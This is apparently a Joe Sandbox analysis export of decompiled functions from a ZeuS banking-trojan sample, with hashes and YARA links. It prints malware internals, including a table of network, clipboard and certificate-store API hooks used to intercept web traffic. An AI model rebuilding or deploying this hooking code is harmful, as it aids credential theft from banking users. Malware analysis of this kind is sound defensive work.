Instruction ID: 4df3c33cc355487fe9d05d54643e6b5bd56fdbce11269c23f09cbfaa804a2a53
Opcode Fuzzy Hash: ae9fa143f870d5f5ebd0b3cc597910b4e445582b321c896fc1a5cb8e1a1fe386
Instruction Fuzzy Hash: 4C617F71A40219AFDB10DEA4CD84EEFBBB8EF44314F14416AFA11F7281DB789E858B54

Uniqueness

Uniqueness Score: -1.00%

Function 00405310, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405310() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00405311
0x0040531f
0x00405328
0x00405332
0x0040533f
0x00405334
0x00405334
0x00000000
0x00405334
0x0040532a
0x0040532a
0x00405337
0x0040533a
0x0040533a
0x00405345

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 0040531F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: fe6ac59ab315fcc37406d5ed7048e2630762bdcfda85e537b1a721fe11d8d0d5
Instruction ID: 74f24d085fb398a505755f3efd6941e3f0022904ac23cfda6013bf0edc79f04e
Opcode Fuzzy Hash: fe6ac59ab315fcc37406d5ed7048e2630762bdcfda85e537b1a721fe11d8d0d5
Instruction Fuzzy Hash: 6FE08631904408CBDB20EBE4EE8199E77F9E711344F700422E842F6180D27CDA468E06

Uniqueness

Uniqueness Score: -1.00%

Function 004016C3, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E004016C3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x004016c3
0x004016c3
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016cd
0x004016cf
0x004016d1
0x004016d5
0x004016d8
0x004016da
0x004016db
0x004016dd
0x004016e2
0x004016e3
0x004016e5
0x004016e5
0x004016e8
0x004016ea
0x004016ec
0x004016ec
0x004016ed
0x004016f0
0x004016f2
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x004016fb
0x004016fd
0x00401701
0x00401707
0x00401709
0x0040170b
0x0040170d
0x0040170f
0x00401711
0x00401713
0x00401715
0x00401719
0x0040171c
0x0040171d
0x00401720
0x00401721
0x00401724
0x00401725
0x00401728
0x00401729
0x0040172c
0x0040172e
0x00401730
0x00401739
0x00401741
0x00401743
0x0040174a
0x0040174b
0x00401753
0x00401761
0x00401767
0x00401769
0x0040176e
0x00401771
0x00401777
0x00401779
0x0040177b
0x0040177f
0x00401787
0x0040178c
0x00401794
0x00401795
0x00401797
0x0040179f
0x004017aa
0x004017ab
0x004017b1
0x004017bb
0x004017c3
0x004017dc
0x004017e5
0x004017ea
0x004017f3
0x004017f5
0x004017f9
0x004017fb
0x00401804
0x00401808
0x0040180b
0x00401810
0x00401811
0x00401814
0x00401819
0x0040181b
0x00401821
0x00401823
0x00401829
0x0040182b
0x00401831
0x00401833
0x0040183b
0x00401843
0x0040184b
0x00401853
0x0040185b
0x00401863
0x0040186b
0x00401873
0x0040187b
0x00401883
0x0040188b
0x00401893
0x00401899
0x0040189d
0x004018a9
0x004018ad
0x004018cf
0x00401915
0x00401917
0x0040191e
0x0040192c

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 31e33c21b8c06eece4b1486e38d46e44d688eb9565853b67097823216a1ce6c3
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 9781A3319893918BC795DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 00407F39, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00407F39(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x00407f40
0x00407f44
0x00407f49
0x00407f4b
0x00407f4e
0x00000000
0x00407f55
0x00407f57
0x00407f6a
0x00407f6c
0x00407f6f
0x00407f70
0x00407f59
0x00407f59
0x00407f60
0x00407f60
0x00407f75
0x00407f80
0x00407f83
0x00407f86
0x00407f87
0x00407f87
0x00000000
0x00407f87
0x00407f8c
0x00407f93
0x00407f95
0x00407fa3
0x00407faa
0x00407fad
0x00407fae
0x00407f97
0x00407f97
0x00407f9e
0x00407f9e
0x00407fb7
0x00407fbc
0x00407fca
0x00407fd1
0x00407fd4
0x00407fd5
0x00407fbe
0x00407fbe
0x00407fc5
0x00407fc5
0x00407fd8
0x00407fdc
0x00407fe2
0x00407fe4
0x00408003
0x00408003
0x00408008
0x00408019
0x0040801e
0x00408026
0x00408027
0x0040800a
0x0040800a
0x00408014
0x00408014
0x0040802c
0x0040803a
0x00408041
0x00408044
0x00408045
0x0040802e
0x0040802e
0x00408035
0x00408035
0x0040804b
0x0040804e
0x00408053
0x00408055
0x0040805c
0x0040805e
0x00408071
0x00408073
0x00408076
0x00408077
0x00408060
0x00408060
0x00408067
0x00408067
0x00408080
0x00408085
0x00408093
0x0040809a
0x0040809d
0x0040809e
0x00408087
0x00408087
0x0040808e
0x0040808e
0x004080a1
0x004080a5
0x004080a5
0x004080b1
0x004080b5
0x004080b8
0x004080c0
0x004080c5
0x004080cb
0x004080ce
0x004080cf
0x004080d2
0x004080da
0x004080dd
0x004080de
0x004080e1
0x004080e1
0x004080e1
0x004080e6
0x00000000
0x004080e6
0x00407ff3
0x00407ff5
0x00407ff9
0x00407fff
0x00408000
0x00000000
0x00408000
0x004080ee
0x004080f9
0x00408100
0x00408100

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction ID: e38a62657d7716bb4eb7a316e5472edfd9f62e27910cbc1015e22cc4e6187ee9
Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction Fuzzy Hash: A951D132E04A269BDB148E58C4506ADF7B1EF85324F1A42BEDD46BF3C5CA74AD41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040E072, Relevance: .1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040E072() {
				void* __ebx;
				intOrPtr _t1;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x4239d4;
				if(_t1 == 0) {
					_t1 =  *0x4239d0;
					 *0x42200c = E00418985;
				} else {
					 *0x42200c = E00418A3C;
				}
				 *0x422008 = _t1;
				 *0x422018 =  *0x4239e0;
				 *0x422028 = GetFileAttributesExW;
				 *0x422038 = HttpSendRequestW;
				 *0x422048 = HttpSendRequestA;
				 *0x422058 = HttpSendRequestExW;
				 *0x422068 = HttpSendRequestExA;
				 *0x422078 = InternetCloseHandle;
				 *0x422088 = InternetReadFile;
				 *0x422098 = __imp__InternetReadFileExA;
				 *0x4220a8 = InternetQueryDataAvailable;
				 *0x4220b8 = HttpQueryInfoA;
				 *0x4220c8 = __imp__#3;
				 *0x4220d8 = __imp__#19;
				 *0x4220e8 = __imp__WSASend;
				 *0x4220f8 = OpenInputDesktop;
				 *0x422108 = SwitchDesktop;
				 *0x422118 = DefWindowProcW;
				 *0x422128 = DefWindowProcA;
				 *0x422138 = DefDlgProcW;
				 *0x422148 = DefDlgProcA;
				 *0x422158 = DefFrameProcW;
				 *0x422168 = DefFrameProcA;
				 *0x422178 = DefMDIChildProcW;
				 *0x422188 = DefMDIChildProcA;
				 *0x422198 = CallWindowProcW;
				 *0x4221a8 = CallWindowProcA;
				 *0x4221b8 = RegisterClassW;
				 *0x4221c8 = RegisterClassA;
				 *0x4221d8 = RegisterClassExW;
				 *0x4221e8 = RegisterClassExA;
				 *0x4221f8 = BeginPaint;
				 *0x422208 = EndPaint;
				 *0x422218 = GetDCEx;
				 *0x422228 = GetDC;
				 *0x422238 = GetWindowDC;
				 *0x422248 = ReleaseDC;
				 *0x422258 = GetUpdateRect;
				 *0x422268 = GetUpdateRgn;
				 *0x422278 = GetMessagePos;
				 *0x422288 = GetCursorPos;
				 *0x422298 = SetCursorPos;
				 *0x4222a8 = SetCapture;
				 *0x4222b8 = ReleaseCapture;
				 *0x4222c8 = GetCapture;
				 *0x4222d8 = GetMessageW;
				 *0x4222e8 = GetMessageA;
				 *0x4222f8 = PeekMessageW;
				 *0x422308 = PeekMessageA;
				 *0x422318 = TranslateMessage;
				_push(0x422008);
				 *0x422328 = GetClipboardData;
				_t55 = 0x34;
				 *0x422338 = __imp__PFXImportCertStore;
				return E0040DFE1(_t55, _t57, _t58);
			}

0x0040e072
0x0040e079
0x0040e087
0x0040e08c
0x0040e07b
0x0040e07b
0x0040e07b
0x0040e096
0x0040e0a0
0x0040e0aa
0x0040e0b4
0x0040e0be
0x0040e0c8
0x0040e0d2
0x0040e0dc
0x0040e0e6
0x0040e0f0
0x0040e0fa
0x0040e104
0x0040e10e
0x0040e118
0x0040e122
0x0040e12c
0x0040e136
0x0040e140
0x0040e14a
0x0040e154
0x0040e15e
0x0040e168
0x0040e172
0x0040e17c
0x0040e186
0x0040e190
0x0040e19a
0x0040e1a4
0x0040e1ae
0x0040e1b8
0x0040e1c2
0x0040e1cc
0x0040e1d6
0x0040e1e0
0x0040e1ea
0x0040e1f4
0x0040e1fe
0x0040e208
0x0040e212
0x0040e21c
0x0040e227
0x0040e231
0x0040e23b
0x0040e245
0x0040e24f
0x0040e259
0x0040e263
0x0040e26d
0x0040e277
0x0040e281
0x0040e28b
0x0040e290
0x0040e29c
0x0040e29d
0x0040e2a8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5440b081e5c14d004d77e6db19f0da771aa4d30ea54d1c0c1fc6eae15c025d27
Instruction ID: 4a1a4cdf0d7351be7e10076b9b38a199d20ba1357be06bf9bcee2250c5f83625
Opcode Fuzzy Hash: 5440b081e5c14d004d77e6db19f0da771aa4d30ea54d1c0c1fc6eae15c025d27
Instruction Fuzzy Hash: 9C61BEB8A00201EFD3A0CF68EFC0A507BE4B3483543E5417AE918E7770E2B5A596DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406397, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406397() {
				signed int _t23;
				signed int _t43;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x4231ac;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x4227e0[_t59] = (( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) >> 0x00000001 ^  *(0x422000 + ((( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) & 0x00000001) * 4) ^  *(0x422e14 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x4227e0[_t64]);
						do {
							 *_t63 =  *(0x422000 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x42319c);
					}
					_t43 =  *0x4227e0; // 0x0
					 *0x42319c = ((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) >> 0x00000001 ^  *(0x422000 + (((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) & 0x00000001) * 4) ^  *0x422e10;
					_t23 = 0;
				}
				 *0x4231ac = _t23 + 1;
				return (0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00406397
0x004063a1
0x004063a9
0x004063b0
0x004063b0
0x004063de
0x004063df
0x004063e6
0x004063f4
0x004063f6
0x004063fd
0x0040641c
0x0040641e
0x00406421
0x004063fd
0x0040642f
0x00406450
0x00406455
0x00406455
0x0040645f
0x0040648a

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30038f3f01e29ea84985964fb5dbad04da84fad0a7c145f422a9bf2c0fe4df14
Instruction ID: 3f994de3488e29091ca47e3073ab5fd6046650022841614af530443dd6c7cbd3
Opcode Fuzzy Hash: 30038f3f01e29ea84985964fb5dbad04da84fad0a7c145f422a9bf2c0fe4df14
Instruction Fuzzy Hash: 4E21C6323304009BD358DF3DED55A1A33E2E789358796843DD616D32A0D678E923CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00416C62, Relevance: .0, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00416C62(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _t12;

				if(E0041CAA4() == 0 || _a8 == 0 || _a12 <= 0) {
					L5:
					return InternetReadFile();
				}
				_t18 = _a16;
				if(_a16 == 0) {
					goto L5;
				}
				_t12 = E0041651A(_t18,  &_a4, _a8, _a12, _a16);
				if(_t12 == 0xffffffff) {
					goto L5;
				}
				return _t12;
			}

0x00416c6c
0x00416c97
0x00416c97
0x00416c97
0x00416c7a
0x00416c7d
0x00000000
0x00000000
0x00416c8c
0x00416c94
0x00000000
0x00000000
0x00416c9e

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWait
String ID:
API String ID: 501323975-0
